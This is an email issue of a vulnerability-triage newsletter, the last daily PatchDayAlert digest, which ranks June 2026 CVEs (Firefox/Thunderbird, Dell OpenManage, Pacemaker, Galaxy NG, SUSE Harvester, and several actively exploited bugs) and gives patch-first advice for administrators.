In partnership with
PatchDayAlert: 2026-06-18
|
|
| |
PROGRAMMING CHANGE
This is the last daily digest. PatchDayAlert goes weekly starting Wednesday, June 24.
You'll get one issue a week instead of one every morning. Same triage, same do-this-first framing, fewer emails. Coverage doesn't shrink: the weekly rounds up every CVE worth acting on from the prior seven days, from the same sources, with the same urgency calls. Your first weekly issue lands Wednesday, June 24.
|
|
|
TODAY'S CALL
Nothing's on fire, but don't sleep on this one. A Firefox/Thunderbird sandbox escape (CVE-2026-12289, CVSS 8.8) lets attackers escalate privileges through the WebRender graphics component if a user hits a malicious page or opens a crafted email. No exploitation in the wild yet, but the attack surface is huge. Four more high-severity bugs round out the day, including a Dell OpenManage RCE and a Pacemaker cluster crasher.
|
|
DO FIRST
| • |
Update Firefox to 152 (or ESR 140.12 / ESR 115.37) and Thunderbird to 152 (or ESR 140.12) through your package manager or Mozilla's update channel
(CVE-2026-12289)
|
| • |
Update the Dell OpenManage Integration plugin for Windows Admin Center to the latest version from Dell's support site
(CVE-2024-24909)
|
| • |
Update the pacemaker package to the patched version from your distribution's repositories and restart the cluster services
(CVE-2026-10649)
|
| • |
Update galaxy_ng to the patched version
(CVE-2026-12398)
|
| • |
Upgrade SUSE Harvester to version 1.8.0 or later
(CVE-2025-71261)
|
|
|
Clear the most in the fewest moves
1 update closes
multiple CVEs at once. Each row is one maintenance decision.
| ACTION |
CVES |
URGENCY |
IMPACT |
|
Update Firefox to 152 (or ESR 140.12 / ESR 115.37) and Thunderbird to 152 (or ESR 140.12) through your package manager or Mozilla's update channel
|
44
3 critical
|
Patch this week, network-reachable only
|
Browser relaunch
|
|
|
TOP THREAT TODAY
|
|
An attacker can escalate privileges through the WebRender graphics component in Firefox and Thunderbird. If a user visits a malicious page or opens a crafted email, the attacker could break out of normal browser sandboxing and gain elevated access on the system. CVSS 8.8, not yet exploited in the wild.
Who's affected: Anyone running Firefox (release or ESR) or Thunderbird on any platform
| |
Patch this week.
Update Firefox to 152 (or ESR 140.12 / ESR 115.37) and Thunderbird to 152 (or ESR 140.12) through your package manager or Mozilla's update channel.
Exposure:
Network-reachable systems
·
Op impact:
Browser relaunch
|
ONE UPDATE · 44 CVEs
3 CRITICAL
NVD
Ref 1
Ref 2
|
|
|
CVE-2024-24909
CVSS 8.8
|
HIGH
|
A remote authenticated user can execute arbitrary code through Dell's OpenManage Integration plugin for Windows Admin Center. Successful exploitation lets the attacker escalate privileges, potentially taking full control of the gateway host. CVSS 8.8, not exploited in the wild.
Affects: Windows admins running Dell OpenManage Integration with Microsoft Windows Admin Center
| |
Patch within 24 hours for internet-facing systems.
Update the Dell OpenManage Integration plugin for Windows Admin Center to the latest version from Dell's support site.
Exposure:
Internet-facing systems
·
Op impact:
Endpoint reboot
|
NVD
Ref 1
|
|
CVE-2026-10649
CVSS 8.6
|
HIGH
|
An unauthenticated remote attacker can crash the Pacemaker CIB remote listener by sending a specially crafted compressed message. The bug is an integer overflow in the decompression path that triggers memory corruption before any authentication check. This is a denial-of-service issue that can take down your cluster management layer. CVSS 8.6.
Affects: Linux sysadmins running Pacemaker-based HA clusters with CIB remote listeners exposed on the network
| |
Patch within 24 hours for internet-facing systems.
Update the pacemaker package to the patched version from your distribution's repositories and restart the cluster services.
Exposure:
Internet-facing systems
|
NVD
Ref 1
Ref 2
|
|
CVE-2026-12398
CVSS 7.5
|
HIGH
|
An authenticated user who controls an external git repository can inject shell commands through crafted branch or tag names when importing legacy roles via the Galaxy NG v1 API. This gives the attacker remote code execution on the Pulp worker. The catch: the vulnerable endpoint is only reachable when GALAXY_ENABLE_LEGACY_ROLES is set to True, which is not the default. CVSS 7.5.
Affects: Ansible Automation Hub or Galaxy NG operators who have enabled GALAXY_ENABLE_LEGACY_ROLES=True
| |
Patch this week.
Update galaxy_ng to the patched version. If you can't patch immediately, set GALAXY_ENABLE_LEGACY_ROLES to False to disable the vulnerable legacy role import endpoint.
Exposure:
Internet-facing systems
|
NVD
Ref 1
Ref 2
|
|
CVE-2025-71261
CVSS 8.6
|
HIGH
|
An attacker with network access between SUSE Harvester's virtualization layer and Rancher Manager can interfere with the TLS handshake and bypass TLS protections entirely. This means management traffic between these components could be intercepted or tampered with. CVSS 8.6, not exploited in the wild. Requires the attacker to be positioned on the internal network path between the two services.
Affects: Teams running SUSE Harvester versions before 1.8.0 with Rancher Manager integration
| |
Patch this week.
Upgrade SUSE Harvester to version 1.8.0 or later.
Exposure:
Network-reachable systems
|
NVD
Ref 1
|
|
Community Signal Check
|
Check Point VPN authentication bypass exploited by Qilin ransomware affiliate
CVE-2026-50751 is a critical authentication bypass in Check Point Remote Access VPN (IKEv1 configs) that's been exploited in the wild since early May. At least one intrusion ties back to a Qilin ransomware affiliate. If you run Check Point VPN with IKEv1, patch now and check your logs for unauthorized sessions going back to May 7.
Check Point Research
•
active_exploitation
|
|
Cisco SD-WAN Manager path traversal exploited in the wild (CVE-2026-20262)
Attackers are actively exploiting a path traversal bug in Cisco Catalyst SD-WAN Manager that lets them create or overwrite files on the OS via crafted HTTP requests, then escalate to root. Cisco has patches out for supported releases. If you run SD-WAN Manager, update today.
Help Net Security
•
active_exploitation
|
|
Windows Netlogon stack overflow RCE exploited against domain controllers
CVE-2026-41089 is a stack-based buffer overflow in Windows Netlogon that gives attackers unauthenticated RCE against domain controllers. Belgium's CERT flagged active exploitation via crafted network requests. This one enables full domain compromise, so patch your DCs before anything else this cycle.
Help Net Security
•
active_exploitation
|
|
Remote Desktop printer redirection regression risk in June patches
Five separate June updates touch the Remote Desktop ActiveX control (mstscax.dll), and testers are flagging it as high risk for printer redirection regressions. Symptoms include missing redirected printers, failed print jobs, and session hangs on reconnect. Test RDP printing in staging before you push KB5094126, KB5094128, or KB5093998 to production.
Application Readiness
•
regression
|
|
|
SECURE BOOT ·
6 days until Microsoft Secure Boot certificates begin expiring (June 24, 2026).
How to remediate →
|
|
Also patched this window
Lower-priority items that cleared the enterprise filter. Scan for anything in your estate.
8.8
CVE-2026-44932
Passing of unsanitized strings from DHCP replies into the wicked dhcp client before wicked 0.6.79 could be used…
|
7.8
CVE-2026-24228
NVIDIA NeMo Framework for Linux contains a vulnerability where an attacker may cause deserialization of untrusted data.
|
8.3
CVE-2026-53853
OpenClaw before 2026.5.12 contains an argument pattern validation bypass in the exec allowlist that allows attackers…
|
|
|
Recent from the blog
The Cisco IOS XE reboot that wasn't remediation
Patching CVE-2023-20198 and rebooting the box clears the web shell but leaves the rogue admin account behind. If you ran one IOS XE web UI…
Juniper Junos OS has six KEV entries and two separate attack surfaces
Five CVSS 5.3 bugs in J-Web that chain to unauthenticated RCE, and a kernel isolation flaw exploited by a China-nexus actor to root MX rout…
A model was pulled for being too good at finding bugs
Anthropic shipped Claude Fable 5 and Mythos 5, then a federal directive killed both four days later. In May we forecast the patch window ha…
|
|
That's your patch day digest, and the last daily one. We'll see you Wednesday, June 24, for the first weekly issue.
|
|
patchdayalert.com
|
|
Keep up with tech in 5 minutes
TLDR is the free daily email with summaries of the most interesting stories in startups, tech, and programming. The stuff worth knowing, minus the doomscrolling.
Issues are curated by ex-Google and Anthropic engineers and land in your inbox before your morning coffee. A 5-minute read, and you walk into the day already knowing what your team is still catching up on.
Tech is just the start. We also cover AI, marketing, dev, and more. Pick the briefs that match your work.
Free, daily, and read by 7M+ subscribers. Subscribe and let the experts do the digging for the tech news that matters.
